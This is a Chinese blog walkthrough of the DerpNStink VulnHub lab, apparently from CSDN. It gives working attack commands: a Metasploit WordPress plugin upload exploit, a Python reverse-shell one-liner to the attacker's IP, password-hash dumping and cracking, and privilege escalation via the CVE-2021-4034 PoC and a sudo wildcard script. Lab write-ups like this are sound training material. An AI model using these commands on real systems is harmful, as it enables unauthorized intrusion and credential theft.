derpnstink

最新推荐文章于 2024-04-17 21:17:18 发布
最新推荐文章于 2024-04-17 21:17:18 发布
阅读量563 收藏 2
点赞数
分类专栏: 靶机学习 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45821131/article/details/125248124
版权

信息收集

访问80端口

搜索页面代码发现一个flag

<--flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) -->

可以直接使用curl 192.168.19.175即可发现flag

访问站点http://192.168.19.175/webnotes/info.txt

发现一段话

<-- @stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live -->

<-- @stinky,确保使用本地 dns 更新您的主机文件,以便可以在新的 derpnstink 博客上线之前访问它 -->

将站点绑定一下,保存在hosts文件中

dirb扫描一下,发现http://derpnstink.local/weblog/wp-admin/站点

使用弱口令尝试登录

wpscan --url http://derpnstink.local/weblog/

提示收费,但是有25天免费的注册

想注册可以注册

wpscan --url http://derpnstink.local/weblog/

需要官网注册获取新令牌:

https://wpscan.com/register

注册成功后选择免费的就行,会生成一个密匙复制进来!

wpscan --url http://derpnstink.local/weblog/ --api-token 密匙

扫描发现6个可利用漏洞

Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload

Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS)

msfconsole

search Slideshow Gallery

use exploit/unix/webapp/wp_slideshowgallery_upload

set rhosts 192.168.19.175

set targeturi /weblog

set wp_user admin

set wp_password admin

exploit

shell

①在msf中建立一个交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

②在kali控制台创建一个shell

nc -vlp 6677

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.19.147",6677));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

kali终端已经拿到shell

python -c 'import pty;pty.spawn("/bin/bash")'

ctrl+z

stty raw -echo

fg(输入时不显示,按回车即可进入shell)

cd ../../..    ---来到/var/www/html/weblog目录枚举信息!

查看wp-config.php文件中password的上下10行内容

grep -10 "password" -rn wp-config.php

mysql -uroot -pmysql

use wordpress

show tables;

select user_login,user_pass from wp_users;

将密码放入一个txt文件中使用john破解尝试

要是爆破过的话,文件存放在~/.john中

历史记录

通过ssh登录发现登录不上去,尝试来到后台登录

直接就能看见flag2

flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

在shell中来到home目录下,查看用户

通过ftp连接到stinky账户,密码还是爆破出来的wedgie57

①可以通过ftp服务器连接

②通过网页连接

Index of ftp://192.168.19.175/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/

发现key(因为通过ssh连接时提示没有公钥,所以此密钥应该是公钥)

chmod 400 key.txt更改文件权限

直接ssh连接时提示      权限被拒绝(公钥)。

获取key.txt后连接,提示sign_and_send_pubkey: no mutual signature supported

签收并发送公钥:不支持相互签名

处理此问题,在~/.ssh目录下新建一个config文件,并将PubkeyAcceptedKeyTypes +ssh-rsa写入其中,再次连接,即可

ssh -i key.txt stinky@192.168.19.175

find / -name "flag*" 2>/dev/null

cat flag.txt

获取flag4

提权①cve-2021-4034

访问https://github.com/arthepsy/CVE-2021-4034/blob/main/cve-2021-4034-poc.c

将代码拷贝下来

存放在一个.c文件中

开启一个python服务

python -m SimpleHTTPSever 8081

wget http://192.168.19.147:8081/derpnstink.c

gcc derpnstink.c -o derpnstink

chmod +x derpnstink

./derpnstink

提权②

来到/home/stinky/Documents目录发现pcap包,下载到本地

传输过来之后用wireshark打开

wireshark derpissues.pcap

追踪TCP流发现

账号:mrderp

密码:derpderpderpderpderpderpderp

su -l

发现可以在(ALL) /home/mrderp/binaries/derpy*执行所有命令

在当前目录创建binaries目录

nano derpy.sh

将提权命令写入其中

#!/bin/bash

bash -i

然后将文件移动到binaries目录下

mv derpy.sh binaries/

sudo ./derpy.sh

无人问津的椰子
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
DeRPnStiNK
战神/calmness的博客
01-19 559
目录 信息泄露 查看robots.txt wpscan 插件漏洞 反弹shell wp-config.php 破解密码john stinky 用户 发现私钥 NC 下载流量包 sudo提权 sudo -l 信息泄露 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux;...
vulnhub:DeRPnStiNK
墨染的博客
10-09 1691
环境搭建 下载虚拟机包文件VMware或VirtualBox打开,配置网络模式为NAT模式。 下载链接:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova hash:949e2f8a7d63fabdc55c675c95efe022 开搞 flag1 首先nmap -sP 192.168.14.1/24一波找一下...
渗透测试靶机---DerpNStink
久恙502的博客
11-06 300
渗透测试,打靶经历记录,大佬多多指点,谢谢!
渗透项目(七):DERPNSTINK: 1
Ays.Ie的博客
11-12 1485
本篇文章记录了作者第7个渗透项目,具体记录了渗透过程以及方法。
数据本地存储
10-11
在Android应用开发中,数据本地存储是至关重要的一个环节,它允许应用在设备上持久化地保存数据,以便在用户下次使用时快速访问或者在离线状态下仍然可用。本篇文章将详细探讨Android中的几种主要本地数据存储方式:...
看完这篇 教你玩转渗透测试靶机Vulnhub——DerpNStink:1
Aluxian_的博客
02-02 1610
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagmedium (中等的)1.信息收集工具得使用2.wpscan和msfconsole的使用,了解模块的利用3.curl读取源码,以及msf反弹shell到本机 (这个是新知识的需要学习)4.数据库的增删改查 以及查看的相关命令,john字典爆破5.SSH。
DerpNStink打靶思路详解(vulnhub),2024最新腾讯网络安全面试分享
最新发布
2401_84411822的博客
04-17 915
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
Vulnhub DeRKnStiNK
zhaji001
01-15 1152
简介 虚拟机下载: https://www.vulnhub.com/entry/derpnstink-1,221/ 靶机: 使用Virtualbox虚拟机导入OVA 攻击机:kali linux  0x001  信息收集 nmap扫描网络找到VM ip地址  nmap -sn 192.168.1.100-254 Nmap scan report for 192.168.1.105 H...
VulnHub-DerpNStink:1渗透学习
我是小小白的博客
07-13 928
前言 靶机地址:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova 靶机难度:中级(CTF) 靶机发布日期:2018 年 2 月 9日 靶机描述:Derp 先生和 Stinky 叔叔是两位正在创办自己的公司 DerpNStink 的系统管理员。他们没有聘请合格的专业人士来建立他们的 IT 环境,而是决定将他们自己的系统组装在一起,该系统几乎准备好上线...... 目标:得到root权限&找到4个flag文件
Vulnhub:Derpnstink靶机渗透
m0_62008601的博客
12-26 1206
渗透学习
DerpNStink打靶思路详解(vulnhub)
MCcming的博客
03-16 893
尝试一下弱口令你妹的,只允许使用密钥登陆。
ssh公钥登录报错:sign_and_send_pubkey: no mutual signature supported
weixin_45016656的博客
06-12 2720
【代码】ssh公钥登录报错:sign_and_send_pubkey: no mutual signature supported。
ssh公钥登录失败报错:sign_and_send_pubkey: no mutual signature supported
墨痕诉清风的博客
06-11 5642
1. 保证id_rsa权限为6002. cd ~/.ssh目录下3. 创建文件config4. 文件内容: PubkeyAcceptedKeyTypes +ssh-rsa,保存退出5. 如果现在开着是xshell终端,打开一个新的xshell终端,反正就是打开一个新的终端窗口6. 再次尝试命令:ssh -i id_rsa martin@192.168.100.66...
【甄选靶场】Vulnhub百个项目渗透——项目七:DerpNStink-1(sql注入,流量分析)
人间体佐菲的博客
08-23 2140
【专为新人甄选】Vulnhub百个项目渗透——项目七:DerpNStink-1
mac-系统升级到MacOS Mojave 10.14.1 后 ssh 登陆不了远程主机
kozazyh的专栏
04-25 2910
使用ssh 登陆后,提示如下错误: $ ssh -i ./z_key_2010 -p 26 -v z@119.xx.xx.151 OpenSSH_7.8p1, LibreSSL 2.7.3 debug1: Reading configuration data /Users/zyh/.ssh/config debug1: Reading configuration data /etc/ssh...
Mac配置SSH免密登陆远程服务器
chuang_z的博客
06-10 463
从OpenSSH 7.x开始,DSA密钥算法组件默认被禁用。Mac采用SSH连接远程服务器
Vulnhub:DeRPnStiNK渗透测试
mandarava的博客
03-08 1010
老规矩,用nmap扫一下。发现端口80、22、21、514。输入命令nmap -T4 -a -v xxx.xxx.xxx.xxx。 Nmap scan report for xxx.xxx.xxx.xxx Host is up (1.2s latency). Not shown: 996 closed ports PORT STATE SERVICE 21/tcp open f...
OSCP - DerpNStink 的破解
kevinhanser
02-18 1309
本文主要记录对 Lazysysadmin 的渗透学习过程,测试的 VM 主机主要来源 www.vulnhub.com DerpNStink 下载链接 初始安装的虚拟机是不知道IP的,首先需要信息收集发现IP,这里使用 netdiscover 在这里插入代码片 使用 nmap 进行端口探测 Starting Nmap 7.70 ( https://nmap.org ) at 2019...
如何derpnstink靶机渗透,大学毕业作业
06-10
如果您是在大学毕业作业的框架下进行derpnstink靶机的渗透测试,那么您应该首先了解derpnstink靶机的网络架构和安全策略,以及您的渗透测试目标和范围。您需要制定一个详细的计划,包括测试方法、工具和技术,以及测试的时间和资源等。在进行渗透测试之前,确保您已经获得了授权,遵守了相关的法律和道德规范,并且已经得到了derpnstink靶机的所有者或管理员的同意。 在渗透测试过程中,您可以使用一些工具和技术来测试系统的安全性,例如漏洞扫描工具、端口扫描工具、密码破解工具等。您还可以使用社会工程学等技术来测试系统的人为安全漏洞。在测试过程中,您需要记录测试结果和发现的漏洞,并及时向derpnstink靶机的所有者或管理员报告和提供建议和解决方案。 需要注意的是,渗透测试需要严格遵守法律和道德准则,不能对他人造成损害或威胁其安全和隐私。同时,您应该保护好测试过程中获得的敏感信息,以避免泄露和滥用。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值